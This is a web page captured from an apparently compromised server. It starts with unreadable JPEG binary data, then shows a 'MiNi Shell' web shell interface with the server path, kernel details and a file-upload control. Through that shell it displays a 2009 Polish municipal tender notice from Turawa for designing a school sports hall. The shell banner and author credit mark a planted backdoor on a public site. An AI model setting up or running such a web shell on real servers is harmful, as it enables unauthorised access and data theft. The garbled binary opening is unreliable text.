JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090211/24772-N-2009.html

<p class="kh_header"><b>Turawa: Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego w trakcie realizacji inwestycji pn.: Sala sportowo - widowiskowa wraz z przyłączami i zagospodarowaniem terenu</b><br>
<b>Numer ogłoszenia: 24772 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Turawa , ul. Opolska 39c, 46-045 Turawa, woj. opolskie, tel. 077 4212012, faks 077 4212073.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.turawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego w trakcie realizacji inwestycji pn.: Sala sportowo - widowiskowa wraz z przyłączami i zagospodarowaniem terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres opracowania projektowo - kosztorysowego obejmuje wykonanie wielobranżowego projektu budowlano - wykonawczego budynku sali sportowo - widowiskowej, dobudowanego i połączonego funkcjonalnie z budynkiem gimnazjum w Turawie, a w tym:
a.	przygotowanie wniosku i uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego,
b.	zapewnienie  aktualizowanych map do celów projektowych,
c.	uzyskanie zapewnienia dostawy mediów i warunków technicznych,
d.	ustalenie geotechnicznych warunków posadowienia budynku,
e.	wykonanie inwentaryzacji i orzeczenia technicznego części szkoły, w zakresie niezbędnym do realizacji celu,
f.	wykonanie projektu budowlano - wykonawczego w branżach:
i.	architektonicznej,
ii.	konstrukcyjnej,
iii.	sanitarnej: c.o., c.w., wodno-kanalizacyjnej, wentylacyjnej, hydrantowej,
iv.	elektrycznej: oświetleniowej, gniazd wtyczkowych, siłowej, piorunochronnej, p/poż, sygnalizacji przyzywowej, nagłaśniającej, telefonicznej, komputerowej,
g.	wykonanie projektu zagospodarowania terenu wraz z projektami budowlano - wykonawczymi elementów zagospodarowania, takich jak:
i.	drogi, chodniki i parking na min. 20 samochodów,
ii.	aranżacja zieleni,
iii.	oświetlenie zewnętrzne.
h.	dodatkowo, w ramach projektu zagospodarowania należy uwzględnić sportowe obiekty terenowe przeznaczone do realizacji w kolejnym etapie, takie jak: przyszkolne boiska, obiekty lekkoatletyczne, trybuny.
i.	wykonanie kosztorysów inwestorskich i ofertowych, z podziałem na branże,
j.	wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych,
k.	uzyskanie niezbędnych uzgodnień projektu budowlano - wykonawczego,
l.	zapewnienie sprawdzenia dokumentacji projektowej zgodnie z wymogami przepisów,
m.	uzyskanie pozwolenia na budowę.
2.	W opracowaniu projektowym należy uwzględnić:  
a.	wymagania określone w założeniach programowo - funkcjonalnych stanowiących załącznik nr 6  do Specyfikacji Istotnych Warunków Zamówienia,
b.	uzgodnienia z Zamawiającym w zakresie rozwiązań  funkcjonalnych, wizualnych i kosztowych.
3.	Opracowanie projektowe przekazane Zamawiającemu wraz z pozwoleniem na  budowę powinno obejmować:
a.	Projekt budowlano - wykonawczy + BIOZ - 4 egz.,
b.	Geotechniczne warunki posadowienia budynku - 2 egz.,
c.	Kosztorysy inwestorski i ofertowy - 3 egz.,
d.	Przedmiar robót - 3 egz.,
e.	Specyfikacje techniczne wykonania i odbioru robót budowlanych - 3 egz.,
f.	Kompletny projekt w zapisie cyfrowym.
4.	W ramach nadzoru autorskiego Wykonawca zobowiązany jest do:
a.	czuwania w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową,
b.	Kontrolowania  parametrów technicznych i estetycznych stosowanych tych materiałów i urządzeń,
c.	uzupełniania szczegółów dokumentacji projektowej oraz udzielania niezbędnych wyjaśnień Wykonawcy robót budowlanych,
d.	Udziału w naradach technicznych. Przyjmuje się, że liczba pobytów projektanta   (-ów) na budowie wynikać będzie z uzasadnionych potrzeb, określonych każdorazowo przez Zamawiającego lub występującego w jego imieniu inspektora nadzoru, a w wyjątkowych sytuacjach - przez kierownika budowy, 
e.	udziału w odbiorze poszczególnych, istotnych części robót budowlanych oraz odbiorze końcowym inwestycji,
f.	sporządzenia dokumentacji powykonawczej, uwzględniającej wszystkie zmiany rozwiązań projektowych wprowadzone przez Zamawiającego.  

Wymaga się od wykonawcy sprawdzenia w terenie warunków wykonania zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium wynosi 2.000 PLN, (dwa tysiące złotych) uiszczane w formach dopuszczonych przez ustawę Prawo Zamówień Publicznych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1)	 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Posiadają uprawnienia niezbędne do wykonania zamówienia, w tym zapewnienie w zespole projektowym udziału co najmniej jednego uprawnionego architekta z uprawnieniami do projektowania bez ograniczeń, oraz uprawnionych projektantów w następujących specjalnościach:
a)	konstrukcyjnej,
b)	drogowej,
c)	instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych,
d)	instalacyjnej w zakresie sieci i urządzeń elektrycznych i elektroenergetycznych;
2)	 Posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ;
4)	 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
5)	Udokumentowanie wykonania w okresie ostatnich 3-ch lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej dokumentacji projektowej sali gimnastycznej  wraz z projektami przyłączy i zagospodarowaniem terenu oraz jednej dokumentacji projektowej budynku użyteczności publicznej o kubaturze powyżej 3 tys.m3,.
6)	Akceptują wzór umowy.

Dokonanie oceny spełnienia w/w warunków nastąpi na podstawie złożonych wymaganych oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.
Wymienione warunki zostaną uznane za spełnione, jeżeli wykonawca złoży poniższe dokumenty.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane:
1)	formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ;
2)	oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Prawo zamówień publicznych oraz oświadczenie, że Zamawiający nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru - załącznik nr 2 do SIWZ - (spełnienie warunku 1, 2, 3 i 4); 
3)	wykaz osób, które będą brały  udział w pracach projektowych w branżach konstrukcyjnej, drogowej, instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci i urządzeń elektrycznych i elektroenergetycznych - załącznik nr 3 do SIWZ - (spełnienie warunku 1 i 2);
4)	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia (spełnienie warunku 1 i 2);
5)	zaświadczenie z właściwej izby samorządu zawodowego, potwierdzające przynależność architektów wykonujących przedmiot zamówienia do izby na dzień składania ofert oraz wymagane ubezpieczenie od odpowiedzialności cywilnej na dzień składania ofert - (spełnienie warunku 1 i 2);
6)	sporządzony  przez oferenta wykaz zrealizowanych dokumentacji zawierający: nazwę, zakres, wartość i czas wykonywania dokumentacji projektowej, nazwę i telefon inwestora - z wykorzystaniem wzoru - załącznik nr 4 do SIWZ - (spełnienie warunku 5); 
7)	dokument potwierdzający, że w/w usługi wykonane zostały należycie i zgodnie z umową , np. referencje - (spełnienie warunku 5); 
8)	zaakceptowana umowa przez Wykonawcę - załącznik nr 5 do SIWZ - (spełnienie warunku 6);
9)	dowód wniesienia wadium;

Wszystkie wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę / osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.turawa.pl            (podstrona: przetargi - specyfikacje, dokumenty).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa,
pokój nr 36.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 10:00, miejsce: Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa,
pokój nr 30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com